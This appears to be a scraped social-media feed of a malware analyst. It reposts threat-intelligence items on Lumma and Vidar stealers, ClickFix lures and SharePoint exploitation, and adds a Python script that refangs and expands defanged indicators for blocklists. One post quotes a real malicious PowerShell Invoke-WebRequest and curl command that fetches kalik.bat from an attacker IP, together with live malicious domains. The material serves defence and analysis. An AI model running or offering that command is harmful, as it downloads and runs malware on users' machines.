ExecuteMalware
@executemalware
#malware hunter & analyst. Opinions are my own.
Disruption ≠ obliteration. Lumma remains one of the most profitable stealers, running both the stealer and its own log market. It’s not Redline or Meta. Even if it gets taken down, expect a rebrand and fresh infrastructure. This ecosystem doesn’t die - it changes.
Lumma infostealer malware returns after law enforcement disruption - @billtoulas bleepingcomputer.com/news/security/…
#BREAKING #ESETresearch can confirm the news of #Lumma Stealer's revival. ESET telemetry and botnet tracking show that operators are rebuilding their infrastructure, with their renewed activity reaching similar levels to those before the #disruption in May 2025. 1/6
A website impersonating a popular streaming service uses an "influencer collaboration" theme to trick viewers into running a malicious Windows shortcut for a multi-stage chain, including a WebDAV server, to push #Vidar #infostealer malware. Details at: bit.ly/456t2ET
Most folks who follow me have seen me chat about Malcat. If you aren't familiar: it is a fairly inexpensive tool for malware analysis and RE that is super powerful. My favorite tool by far. The developer is doing a stream next week, something well worth catching.
Join us on Tuesday, July 29th, at 14:00 EST for a special live stream with Renaud Tabary from @malcat4ever where we will explore and perform live malware triage with Malcat! twitch.tv/InvokeReversing
+ bookingcomplaint-id8873\.live complaintsub{81273,81275}\.com id33kpartnet\.com reported-id6736\.com revers-id-{372,732,837}extranet\.com visitor{3304,372484,86326,885061,9204}\.help
#booking #clickfix #fakecaptcha visitor31740].help 👇 powershell -c "Invoke-WebRequest -Uri '95.164.55.]176:5554/kalik.bat' 👇curl 95.164.55.176:5554 👇 kalik.bat 👇 JPERGDUP.msi STZIAZID.msi Samples bazaar.abuse.ch/browse/tag/95-… AnyRun app.any.run/tasks/65aa50fa… cc @500mk500 @k3dg3
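The two posts above publish their indicators defanged (`\.`, stray `]`, and shell-style `{a,b}` alternatives for sibling domains), which is safe to share but useless to paste into a blocklist as-is. The script below is an added example, not code from the poster or from any of the tools mentioned on this page: it refangs each token, expands the brace alternatives into concrete hostnames, and sorts what is left into domains, IPs, endpoints and dropped file names. The `SAMPLE` text is constructed here from the indicators quoted in the two posts; the regexes and category names are this example's own choices.

```python
"""Refang and expand defanged IOCs as posted by analysts (added example)."""
import re
from ipaddress import ip_address

# Constructed sample: the indicators from the two posts above, hashtags included.
SAMPLE = r"""+ bookingcomplaint-id8873\.live complaintsub{81273,81275}\.com id33kpartnet\.com reported-id6736\.com revers-id-{372,732,837}extranet\.com visitor{3304,372484,86326,885061,9204}\.help
#booking #clickfix #fakecaptcha visitor31740].help powershell -c "Invoke-WebRequest -Uri '95.164.55.]176:5554/kalik.bat' curl 95.164.55.176:5554 kalik.bat JPERGDUP.msi STZIAZID.msi"""

FILE_RE = re.compile(r"^[\w-]+\.(?:bat|msi|exe|ps1|dll|zip)$", re.I)
IPV4_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?(/.*)?$")
DOMAIN_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z]{2,}$", re.I)


def refang(tok):
    """Undo the common defangs: hxxp, '\\.', '[.]', and stray ']' / '[' as in '55.]176'."""
    tok = tok.strip("'\"(),;")
    tok = tok.replace("hxxp", "http").replace("\\.", ".").replace("[.]", ".")
    return tok.replace("[", "").replace("]", "")


def expand_braces(tok):
    """Expand {a,b,c} alternatives recursively: visitor{1,2}.help -> two hostnames."""
    m = re.search(r"\{([^{}]*)\}", tok)
    if not m:
        return [tok]
    head, tail = tok[:m.start()], tok[m.end():]
    out = []
    for alt in m.group(1).split(","):
        out.extend(expand_braces(head + alt + tail))
    return out


def extract(text):
    """Return sorted IOCs by category from a block of defanged analyst text."""
    found = {"domain": set(), "ip": set(), "endpoint": set(), "file": set()}
    for raw in text.split():
        if raw.startswith(("#", "@")):        # hashtags and handles are not indicators
            continue
        for tok in expand_braces(refang(raw)):
            if FILE_RE.match(tok):            # check files first: kalik.bat also looks like a domain
                found["file"].add(tok)
                continue
            m = IPV4_RE.match(tok)
            if m:
                try:
                    ip_address(m.group(1))    # reject 999.1.1.1-style false positives
                except ValueError:
                    continue
                found["ip"].add(m.group(1))
                if m.group(2) or m.group(3):  # keep ip:port[/path] as a separate endpoint IOC
                    found["endpoint"].add(tok)
                continue
            if DOMAIN_RE.match(tok):
                found["domain"].add(tok.lower())
    return {k: sorted(v) for k, v in found.items()}


if __name__ == "__main__":
    for category, items in extract(SAMPLE).items():
        print(category, len(items))
        for item in items:
            print("  ", item)
```

Running it on the sample yields one IP, two endpoints (with and without the `/kalik.bat` path), three dropped files and fourteen concrete domains, including the five `visitor*.help` siblings hidden behind one brace group. Files are classified before domains on purpose, since `kalik.bat` and the `.msi` names would otherwise pass the hostname check.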
Binary Ninja 5.1 is now released: binary.ninja/2025/07/24/5.1… - New WARP function matching - Pseudo Objective-C - Binexport plugin built-in - IL Rewriting Examples, APIs, and Docs - Arch: PPC VLE, mips-r5900, x32 + Much more!
🚨 Control-Flow Flattening Obfuscated #JavaScript Drops #SnakeKeylogger. The #malware uses layered obfuscation to hide execution logic and evade traditional detection. ⚠️ Our data shows banking is the most affected sector among our users, nearly matching all the other industries…
100 Days of YARA, YARA Rule Tips and The Current State of Email borne Threats with Greg Lesnewich x.com/i/broadcasts/1…
Just a heads-up, attackers found a way to leak information, including keys entirely from memory. Checking for "the file" is not enough to assess compromise and warrant key rotation anymore. Just rotate your keys if you were exposed, period.
sharepoint.pwned.json gist.github.com/gboddin/bf6ff3…
This mitigation is critical (esp based on Storm-2603 exploitation) and I expect it’s most-likely to be overlooked: 🔃🔑 Rotate SharePoint Server ASP .NET machine keys • After applying the latest security updates above or enabling AMSI, it is critical that customers rotate…
Microsoft is sharing details from ongoing investigations of threat actors exploiting vulnerabilities targeting on-premises SharePoint servers. Linen Typhoon, Violet Typhoon, and Storm-2603 have been observed exploiting the vulnerabilities: msft.it/6015sE1p5
Phishing activity in the past 7 days 🐟 Track latest #phishing threats in TI Lookup: intelligence.any.run/analysis/looku…
🎯 Business security requires addressing diverse threats, from mobile #malware to Python-based stealers. Equip your team with real-time analysis and full visibility across Windows, Linux, and Android to accelerate detection & response: any.run/demo?utm_sourc…
🔥 Ready for this week's live stream with Greg Lesnewich... youtube.com/live/JIxbM82hW…
Top 10 last week's threats by uploads 🌐 ⬆️ #Lumma 635 (628) ⬇️ #Xworm 282 (369) ⬆️ #Zombie 216 (176) ⬇️ #Snake 200 (306) ⬇️ #Asyncrat 183 (238) ⬇️ #Remcos 163 (317) ⬆️ #Amadey 153 (111) ⬇️ #Agenttesla 148 (175) ⬆️ #Njrat 147 (106) ⬇️ #Dcrat 129 (186) Track them all:…
#ClickFix went from virtually non-existent to the second most common attack vector blocked by #ESET, surpassed only by #phishing. This novel social engineering technique accounted for nearly 8% of all detections in H1 2025. #ESETresearch 1/7
Exciting! @vector35's excellent #BinaryNinja ships with built-in BinExport in the latest dev version! Here's how to use it with #BinDiff: dev-docs.binary.ninja/guide/binexpor…
Video: Introduction to Beacon Object Files (BOFs)! Executing native code in-memory and at runtime to improve red team stealth. 😎 We start small to understand Dynamic Function Resolution and create a small Empire module to call Win32 API functions! youtu.be/p3fByg8pa1g